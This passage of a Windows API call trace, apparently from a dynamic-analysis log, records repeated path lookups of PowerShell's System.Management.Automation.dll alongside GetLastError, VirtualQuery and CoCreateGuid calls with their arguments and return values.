lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.299] GetLastError () returned 0x0 [0152.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.299] GetLastError () returned 0x0 [0152.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.299] GetLastError () returned 0x0 [0152.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.299] GetLastError () returned 0x0 [0152.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.299] GetLastError () returned 0x0 [0152.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.299] GetLastError () returned 0x0 [0152.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.299] GetLastError () returned 0x0 [0152.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.299] GetLastError () returned 0x0 [0152.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.299] GetLastError () returned 0x0 [0152.299] VirtualQuery (in: lpAddress=0x23ce84, lpBuffer=0x23de84, dwLength=0x1c | out: lpBuffer=0x23de84*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.300] GetLastError () returned 0x0 [0152.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.300] GetLastError () returned 0x0 [0152.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.300] GetLastError () returned 0x0 [0152.300] VirtualQuery (in: lpAddress=0x23cf8c, lpBuffer=0x23df8c, dwLength=0x1c | out: lpBuffer=0x23df8c*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.300] GetLastError () returned 0x0 [0152.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.300] GetLastError () returned 0x0 [0152.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.300] GetLastError () returned 0x0 [0152.300] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x4c44b062, Data2=0x5418, Data3=0x4e99, Data4=([0]=0x8d, [1]=0x3, [2]=0x84, [3]=0x8d, [4]=0xc, [5]=0x24, [6]=0xec, [7]=0xe4))) returned 0x0 [0152.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x97fa5fb0, Data2=0x26e4, Data3=0x443e, Data4=([0]=0xa3, [1]=0xe9, [2]=0xd, [3]=0x55, [4]=0x54, [5]=0x14, [6]=0xca, [7]=0xe0))) returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.301] GetLastError () returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.302] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x8652d244, Data2=0xfe4, Data3=0x4870, Data4=([0]=0x8a, [1]=0x49, [2]=0xc4, [3]=0xc4, [4]=0x54, [5]=0x9f, [6]=0xcd, [7]=0x97))) returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.302] GetLastError () returned 0x0 [0152.303] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xcd652d4e, Data2=0xd1a8, Data3=0x46d4, Data4=([0]=0x8d, [1]=0xb7, [2]=0xbe, [3]=0x72, [4]=0xae, [5]=0x80, [6]=0xf6, [7]=0x5e))) returned 0x0 [0152.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.303] GetLastError () returned 0x0 [0152.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.303] GetLastError () returned 0x0 [0152.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.303] GetLastError () returned 0x0 [0152.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.303] GetLastError () returned 0x0 [0152.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.303] GetLastError () returned 0x0 [0152.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.303] GetLastError () returned 0x0 [0152.303] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x41827d51, Data2=0x43c5, Data3=0x4d7e, Data4=([0]=0x98, [1]=0x5, [2]=0x13, [3]=0x74, [4]=0xee, [5]=0x77, [6]=0x7f, [7]=0x95))) returned 0x0 [0152.304] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xf81baf1, Data2=0x69a9, Data3=0x452f, Data4=([0]=0x80, [1]=0x69, [2]=0x4c, [3]=0x93, [4]=0x9c, [5]=0x11, [6]=0x19, [7]=0xb))) returned 0x0 [0152.304] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xf30c3949, Data2=0xeee2, Data3=0x4cab, Data4=([0]=0xb6, [1]=0xeb, [2]=0x4b, [3]=0xdb, [4]=0x7d, [5]=0xdd, [6]=0xc4, [7]=0x2e))) returned 0x0 [0152.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.304] GetLastError () returned 0x0 [0152.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.304] GetLastError () returned 0x0 [0152.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.304] GetLastError () returned 0x0 [0152.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.304] GetLastError () returned 0x0 [0152.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.304] GetLastError () returned 0x0 [0152.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.304] GetLastError () returned 0x0 [0152.305] CoCreateGuid (in: pguid=0x23e538 | 